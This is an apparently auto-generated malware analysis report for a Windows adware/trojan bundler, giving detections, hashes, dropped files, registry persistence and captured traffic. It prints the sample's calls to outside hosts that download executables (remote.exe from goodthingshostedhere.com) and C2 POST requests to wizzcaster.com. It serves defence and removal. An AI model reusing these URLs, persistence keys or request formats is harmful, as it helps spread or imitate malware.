Application.Bundler.AHD_f5798be4be
Application.Bundler.AHD (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Eorezo.966 (DrWeb), Application.Bundler.AHD (B) (Emsisoft), Artemis!F5798BE4BEDE (McAfee), Trojan.Gen.2 (Symantec), Application.Bundler.AHD (FSecure), Atros5.AATF (AVG), Win32:Malware-gen (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: f5798be4bede0b19af8c4e0d64d16c19
SHA1: 535492c09fcddd7964bfd01d4a5ad808704b329c
SHA256: b576cf26d39220318483f4d375bb4c33428e4ee3b83d066d1845c8485fc57595
SSDeep: 24576:g/E8X4leBFqZNGDTL3nuMIrXZLdeaUzDWk2LN3O2wd7QUwIEqi1oy0HSGgJrn9g1:fWaGrJIrXZxJ0dDNlyHNP88KLveG
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: PMW1 Executable Image using DOS Extender, Microsoft Visual C, .NET executable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-03-27 11:35:55
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
oaSxO69ceEYCuoXQifBI.exe:2892
The Application injects its code into the following process(es):
oaSxO69ceE.exe:2540
%original file name%.exe:3340
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process oaSxO69ceE.exe:2540 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)
The process %original file name%.exe:3340 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe (34156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceEYCuoXQifBI.exe (24029 bytes)
Registry activity
The process oaSxO69ceE.exe:2540 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\oaSxO69ceE_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
To run itself automatically each time Windows boots, the Application adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"1ZC2LXW2CD3Q5SL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe"
The process %original file name%.exe:3340 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "14/04/2017"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\wewewe]
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\f5798be4bede0b19af8c4e0d64d16c19_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process oaSxO69ceEYCuoXQifBI.exe:2892 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"
Dropped PE files
| MD5 | File path |
|---|---|
| 00bc75d006a8fa69008e74abe81f7f7c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe |
| 40569a05f6a3b7ee1851e238dc9478ef | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceEYCuoXQifBI.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: YE
Product Name: YEPG1L5
Product Version: 2.1.8.0
Legal Copyright: Copyright (c) 4306
Legal Trademarks:
Original Filename: KiKo2.exe
Internal Name: KiKo2.exe
File Version: 2.1.8.0
File Description: YEPG1L
Comments: Y
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2171288 | 2171392 | 4.1699 | 309ce74910e2352a28227fb567eca04d |
| .rsrc | 2187264 | 211244 | 211456 | 4.33969 | e7e33f4d539293ce7933659607f5d08d |
| .reloc | 2400256 | 12 | 512 | 0.070639 | e395cc20f44ab1b104a89f055ca17f28 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://goodthingshostedhere.com/get/4/remote.exe | |
| wizzcaster.com | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Fri, 14 Apr 2017 09:54:39 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=ec1db606d953e8c5aa6a9290bd204335ea2005c5; expires=Fri, 14-Apr-2017 11:54:39 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Fri, 14 Apr 2017 09:54:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=736e7946a4aa03c4f5c88386eae55461aed7ba2c; expires=Fri, 14-Apr-2017 11:54:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 62
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}
GET /get/4/remote.exe HTTP/1.1
Host: goodthingshostedhere.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Apr 2017 09:54:33 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: goodthingshostedhere.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Apr 2017 09:54:33 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
The Application connects to the servers at the following location(s):
iexplore.exe_2760:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
%original file name%.exe_3340_rwx_69722000_00002000:
.ri3J
-yiq.yiw
-yiq.yi
oaSxO69ceE.exe_2540_rwx_69722000_00002000:
.ri3J
-yiq.yiw
-yiq.yi
SearchProtocolHost.exe_256:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_1388:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
oaSxO69ceEYCuoXQifBI.exe:2892
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe (34156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceEYCuoXQifBI.exe (24029 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"1ZC2LXW2CD3Q5SL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\oaSxO69ceE.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.